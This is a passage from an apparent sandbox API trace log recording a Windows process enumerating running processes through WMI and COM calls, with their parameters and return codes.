riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e5dc | out: ppvObject=0x36e5dc*=0x0) returned 0x80004002 [0224.472] IUnknown:Release (This=0x5e90af0) returned 0x2 [0224.472] CoGetContextToken (in: pToken=0x36eb44 | out: pToken=0x36eb44) returned 0x0 [0224.472] CoGetContextToken (in: pToken=0x36eaa4 | out: pToken=0x36eaa4) returned 0x0 [0224.472] IUnknown:QueryInterface (in: This=0x5e90af0, riid=0x36eb74*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x36eb70 | out: ppvObject=0x36eb70*=0x5e90af0) returned 0x0 [0224.472] IUnknown:AddRef (This=0x5e90af0) returned 0x4 [0224.472] IUnknown:Release (This=0x5e90af0) returned 0x3 [0224.472] IUnknown:Release (This=0x5e90af0) returned 0x2 [0224.472] CoTaskMemFree (pv=0x5e89250) [0224.473] CoGetContextToken (in: pToken=0x36eeb4 | out: pToken=0x36eeb4) returned 0x0 [0224.473] IUnknown:AddRef (This=0x5e90af0) returned 0x3 [0224.473] IWbemClassObject:Get (in: This=0x5e90af0, wszName="__GENUS", lFlags=0, pVal=0x36f1b4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36f234*=0, plFlavor=0x36f230*=0 | out: pVal=0x36f1b4*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x36f234*=3, plFlavor=0x36f230*=64) returned 0x0 [0224.473] IWbemClassObject:Get (in: This=0x5e90af0, wszName="__PATH", lFlags=0, pVal=0x36f198*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36f21c*=0, plFlavor=0x36f218*=0 | out: pVal=0x36f198*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2376\"", varVal2=0x0), pType=0x36f21c*=8, plFlavor=0x36f218*=64) returned 0x0 [0224.474] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2376\"") returned 0x66 [0224.474] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2376\"") returned 0x66 [0224.474] CoGetObjectContext (in: riid=0x2414360*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36f1c4 | out: ppv=0x36f1c4*=0x6ee4bc) returned 0x0 [0224.474] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6ee4bc, pAptType=0x36f1bc | out: pAptType=0x36f1bc*=1) returned 0x0 [0224.474] IUnknown:QueryInterface (in: This=0x6ee4bc, riid=0x2414348*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x36f1c0 | out: ppvObject=0x36f1c0*=0x0) returned 0x80004002 [0224.474] IUnknown:Release (This=0x6ee4bc) returned 0x1 [0224.476] CoGetClassObject (in: rclsid=0x761ab4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36eb30 | out: ppv=0x36eb30*=0x5e89250) returned 0x0 [0224.476] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e89250, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36ed48 | out: ppvObject=0x36ed48*=0x0) returned 0x80004002 [0224.476] WbemDefPath:IClassFactory:CreateInstance (in: This=0x5e89250, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36ed54 | out: ppvObject=0x36ed54*=0x5e8a0b0) returned 0x0 [0224.476] WbemDefPath:IUnknown:Release (This=0x5e89250) returned 0x0 [0224.476] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e8a0b0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e974 | out: ppvObject=0x36e974*=0x5e8a0b0) returned 0x0 [0224.476] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e8a0b0, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36e928 | out: ppvObject=0x36e928*=0x0) returned 0x80004002 [0224.477] WbemDefPath:IUnknown:AddRef (This=0x5e8a0b0) returned 0x3 [0224.477] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e8a0b0, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e284 | out: ppvObject=0x36e284*=0x0) returned 0x80004002 [0224.477] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e8a0b0, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e234 | out: ppvObject=0x36e234*=0x0) returned 0x80004002 [0224.477] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e8a0b0, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e240 | out: ppvObject=0x36e240*=0x5e89260) returned 0x0 [0224.477] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5e89260, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x36e248 | out: pCid=0x36e248*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0224.477] WbemDefPath:IUnknown:Release (This=0x5e89260) returned 0x3 [0224.477] CoGetContextToken (in: pToken=0x36e2a0 | out: pToken=0x36e2a0) returned 0x0 [0224.477] CoGetContextToken (in: pToken=0x36e6b4 | out: pToken=0x36e6b4) returned 0x0 [0224.477] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e8a0b0, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e734 | out: ppvObject=0x36e734*=0x0) returned 0x80004002 [0224.477] WbemDefPath:IUnknown:Release (This=0x5e8a0b0) returned 0x2 [0224.477] WbemDefPath:IUnknown:Release (This=0x5e8a0b0) returned 0x1 [0224.477] CoGetContextToken (in: pToken=0x36f044 | out: pToken=0x36f044) returned 0x0 [0224.477] CoGetContextToken (in: pToken=0x36efa4 | out: pToken=0x36efa4) returned 0x0 [0224.477] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e8a0b0, riid=0x36f074*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x36f070 | out: ppvObject=0x36f070*=0x5e8a0b0) returned 0x0 [0224.477] WbemDefPath:IUnknown:AddRef (This=0x5e8a0b0) returned 0x3 [0224.477] WbemDefPath:IUnknown:Release (This=0x5e8a0b0) returned 0x2 [0224.477] WbemDefPath:IWbemPath:SetText (This=0x5e8a0b0, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2376\"") returned 0x0 [0224.478] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768a58, puCount=0x36f1f0 | out: puCount=0x36f1f0*=0x2) returned 0x0 [0224.478] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1ec*=0x0, pszText=0x0 | out: puBuffLength=0x36f1ec*=0xf, pszText=0x0) returned 0x0 [0224.478] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1ec*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f1ec*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0224.478] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768a58, puCount=0x36f1bc | out: puCount=0x36f1bc*=0x2) returned 0x0 [0224.478] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1b8*=0x0, pszText=0x0 | out: puBuffLength=0x36f1b8*=0xf, pszText=0x0) returned 0x0 [0224.478] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1b8*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f1b8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0224.478] IWbemClassObject:Get (in: This=0x5e90af0, wszName="Name", lFlags=0, pVal=0x36f1b8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26e2ac4*=0, plFlavor=0x26e2ac8*=0 | out: pVal=0x36f1b8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="have return physical.exe", varVal2=0x0), pType=0x26e2ac4*=8, plFlavor=0x26e2ac8*=0) returned 0x0 [0224.478] SysStringByteLen (bstr="have return physical.exe") returned 0x30 [0224.478] SysStringByteLen (bstr="have return physical.exe") returned 0x30 [0224.478] IWbemClassObject:Get (in: This=0x5e90af0, wszName="Name", lFlags=0, pVal=0x36f1c0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26e2ac4*=8, plFlavor=0x26e2ac8*=0 | out: pVal=0x36f1c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="have return physical.exe", varVal2=0x0), pType=0x26e2ac4*=8, plFlavor=0x26e2ac8*=0) returned 0x0 [0224.478] SysStringByteLen (bstr="have return physical.exe") returned 0x30 [0224.478] SysStringByteLen (bstr="have return physical.exe") returned 0x30 [0224.479] CoTaskMemAlloc (cb=0x4) returned 0x5e89290 [0224.479] IEnumWbemClassObject:Next (in: This=0x70f9f0, lTimeout=-1, uCount=0x1, apObjects=0x5e89290, puReturned=0x26dde18 | out: apObjects=0x5e89290*=0x5e90f88, puReturned=0x26dde18*=0x1) returned 0x0 [0224.526] IUnknown:QueryInterface (in: This=0x5e90f88, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e81c | out: ppvObject=0x36e81c*=0x5e90f88) returned 0x0 [0224.526] IUnknown:QueryInterface (in: This=0x5e90f88, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36e7d0 | out: ppvObject=0x36e7d0*=0x0) returned 0x80004002 [0224.526] IUnknown:QueryInterface (in: This=0x5e90f88, riid=0x71e41e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36e5f8 | out: ppvObject=0x36e5f8*=0x0) returned 0x80004002 [0224.527] IUnknown:AddRef (This=0x5e90f88) returned 0x3 [0224.527] IUnknown:QueryInterface (in: This=0x5e90f88, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e12c | out: ppvObject=0x36e12c*=0x0) returned 0x80004002 [0224.527] IUnknown:QueryInterface (in: This=0x5e90f88, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e0dc | out: ppvObject=0x36e0dc*=0x0) returned 0x80004002 [0224.527] IUnknown:QueryInterface (in: This=0x5e90f88, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e0e8 | out: ppvObject=0x36e0e8*=0x5e90f8c) returned 0x0 [0224.527] IMarshal:GetUnmarshalClass (in: This=0x5e90f8c, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x36e0f0 | out: pCid=0x36e0f0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0224.527] IUnknown:Release (This=0x5e90f8c) returned 0x3 [0224.527] CoGetContextToken (in: pToken=0x36e148 | out: pToken=0x36e148) returned 0x0 [0224.528] CoGetContextToken (in: pToken=0x36e55c | out: pToken=0x36e55c) returned 0x0 [0224.528] IUnknown:QueryInterface (in: This=0x5e90f88, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e5dc | out: ppvObject=0x36e5dc*=0x0) returned 0x80004002 [0224.528] IUnknown:Release (This=0x5e90f88) returned 0x2 [0224.528] CoGetContextToken (in: pToken=0x36eb44 | out: pToken=0x36eb44) returned 0x0 [0224.528] CoGetContextToken (in: pToken=0x36eaa4 | out: pToken=0x36eaa4) returned 0x0 [0224.528] IUnknown:QueryInterface (in: This=0x5e90f88, riid=0x36eb74*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x36eb70 | out: ppvObject=0x36eb70*=0x5e90f88) returned 0x0 [0224.528] IUnknown:AddRef (This=0x5e90f88) returned 0x4 [0224.528] IUnknown:Release (This=0x5e90f88) returned 0x3 [0224.528] IUnknown:Release (This=0x5e90f88) returned 0x2 [0224.528] CoTaskMemFree (pv=0x5e89290) [0224.528] CoGetContextToken (in: pToken=0x36eeb4 | out: pToken=0x36eeb4) returned 0x0 [0224.528] IUnknown:AddRef (This=0x5e90f88) returned 0x3 [0224.528] IWbemClassObject:Get (in: This=0x5e90f88, wszName="__GENUS", lFlags=0, pVal=0x36f1b4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36f234*=0, plFlavor=0x36f230*=0 | out: pVal=0x36f1b4*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x36f234*=3, plFlavor=0x36f230*=64) returned 0x0 [0224.529] IWbemClassObject:Get (in: This=0x5e90f88, wszName="__PATH", lFlags=0, pVal=0x36f198*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36f21c*=0, plFlavor=0x36f218*=0 | out: pVal=0x36f198*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2384\"", varVal2=0x0), pType=0x36f21c*=8, plFlavor=0x36f218*=64) returned 0x0 [0224.529] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2384\"") returned 0x66 [0224.529] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2384\"") returned 0x66 [0224.529] CoGetObjectContext (in: riid=0x2414360*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36f1c4 | out: ppv=0x36f1c4*=0x6ee4bc) returned 0x0 [0224.529] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6ee4bc, pAptType=0x36f1bc | out: pAptType=0x36f1bc*=1) returned 0x0 [0224.529] IUnknown:QueryInterface (in: This=0x6ee4bc, riid=0x2414348*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x36f1c0 | out: ppvObject=0x36f1c0*=0x0) returned 0x80004002 [0224.530] IUnknown:Release (This=0x6ee4bc) returned 0x1 [0224.531] CoGetClassObject (in: rclsid=0x761ab4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36eb30 | out: ppv=0x36eb30*=0x5e89290) returned 0x0 [0224.531] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e89290, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36ed48 | out: ppvObject=0x36ed48*=0x0) returned 0x80004002 [0224.531] WbemDefPath:IClassFactory:CreateInstance (in: This=0x5e89290, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36ed54 | out: ppvObject=0x36ed54*=0x5e8a190) returned 0x0 [0224.531] WbemDefPath:IUnknown:Release (This=0x5e89290) returned 0x0 [0224.531] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e8a190, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e974 | out: ppvObject=0x36e974*=0x5e8a190) returned 0x0 [0224.531] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e8a190, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36e928 | out: ppvObject=0x36e928*=0x0) returned 0x80004002 [0224.532] WbemDefPath:IUnknown:AddRef (This=0x5e8a190) returned 0x3 [0224.532] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e8a190, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e284 | out: ppvObject=0x36e284*=0x0) returned 0x80004002 [0224.532] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e8a190, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e234 | out: ppvObject=0x36e234*=0x0) returned 0x80004002 [0224.532] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e8a190, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e240 | out: ppvObject=0x36e240*=0x5e892a0) returned 0x0 [0224.532] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5e892a0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x36e248 | out: pCid=0x36e248*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0224.532] WbemDefPath:IUnknown:Release (This=0x5e892a0) returned 0x3 [0224.532] CoGetContextToken (in: pToken=0x36e2a0 | out: pToken=0x36e2a0) returned 0x0 [0224.532] CoGetContextToken (in: pToken=0x36e6b4 | out: pToken=0x36e6b4) returned 0x0 [0224.532] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e8a190, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e734 | out: ppvObject=0x36e734*=0x0) returned 0x80004002 [0224.532] WbemDefPath:IUnknown:Release (This=0x5e8a190) returned 0x2 [0224.532] WbemDefPath:IUnknown:Release (This=0x5e8a190) returned 0x1 [0224.532] CoGetContextToken (in: pToken=0x36f044 | out: pToken=0x36f044) returned 0x0 [0224.532] CoGetContextToken (in: pToken=0x36efa4 | out: pToken=0x36efa4) returned 0x0 [0224.532] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e8a190, riid=0x36f074*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x36f070 | out: ppvObject=0x36f070*=0x5e8a190) returned 0x0 [0224.533] WbemDefPath:IUnknown:AddRef (This=0x5e8a190) returned 0x3 [0224.533] WbemDefPath:IUnknown:Release (This=0x5e8a190) returned 0x2 [0224.533] WbemDefPath:IWbemPath:SetText (This=0x5e8a190, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2384\"") returned 0x0 [0224.533] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768a58, puCount=0x36f1f0 | out: puCount=0x36f1f0*=0x2) returned 0x0 [0224.533] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1ec*=0x0, pszText=0x0 | out: puBuffLength=0x36f1ec*=0xf, pszText=0x0) returned 0x0 [0224.533] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1ec*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f1ec*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0224.533] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768a58, puCount=0x36f1bc | out: puCount=0x36f1bc*=0x2) returned 0x0 [0224.533] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1b8*=0x0, pszText=0x0 | out: puBuffLength=0x36f1b8*=0xf, pszText=0x0) returned 0x0 [0224.533] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1b8*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f1b8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0224.533] IWbemClassObject:Get (in: This=0x5e90f88, wszName="Name", lFlags=0, pVal=0x36f1b8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26e3368*=0, plFlavor=0x26e336c*=0 | out: pVal=0x36f1b8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="or level.exe", varVal2=0x0), pType=0x26e3368*=8, plFlavor=0x26e336c*=0) returned 0x0 [0224.533] SysStringByteLen (bstr="or level.exe") returned 0x18 [0224.533] SysStringByteLen (bstr="or level.exe") returned 0x18 [0224.533] IWbemClassObject:Get (in: This=0x5e90f88, wszName="Name", lFlags=0, pVal=0x36f1c0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26e3368*=8, plFlavor=0x26e336c*=0 | out: pVal=0x36f1c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="or level.exe", varVal2=0x0), pType=0x26e3368*=8, plFlavor=0x26e336c*=0) returned 0x0 [0224.533] SysStringByteLen (bstr="or level.exe") returned 0x18 [0224.533] SysStringByteLen (bstr="or level.exe") returned 0x18 [0224.533] CoTaskMemAlloc (cb=0x4) returned 0x5e892d0 [0224.533] IEnumWbemClassObject:Next (in: This=0x70f9f0, lTimeout=-1, uCount=0x1, apObjects=0x5e892d0, puReturned=0x26dde18 | out: apObjects=0x5e892d0*=0x5e913f0, puReturned=0x26dde18*=0x1) returned 0x0 [0224.535] IUnknown:QueryInterface (in: This=0x5e913f0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e81c | out: ppvObject=0x36e81c*=0x5e913f0) returned 0x0 [0224.535] IUnknown:QueryInterface (in: This=0x5e913f0, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36e7d0 | out: ppvObject=0x36e7d0*=0x0) returned 0x80004002 [0224.535] IUnknown:QueryInterface (in: This=0x5e913f0, riid=0x71e41e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36e5f8 | out: ppvObject=0x36e5f8*=0x0) returned 0x80004002 [0224.536] IUnknown:AddRef (This=0x5e913f0) returned 0x3 [0224.536] IUnknown:QueryInterface (in: This=0x5e913f0, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e12c | out: ppvObject=0x36e12c*=0x0) returned 0x80004002 [0224.536] IUnknown:QueryInterface (in: This=0x5e913f0, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, 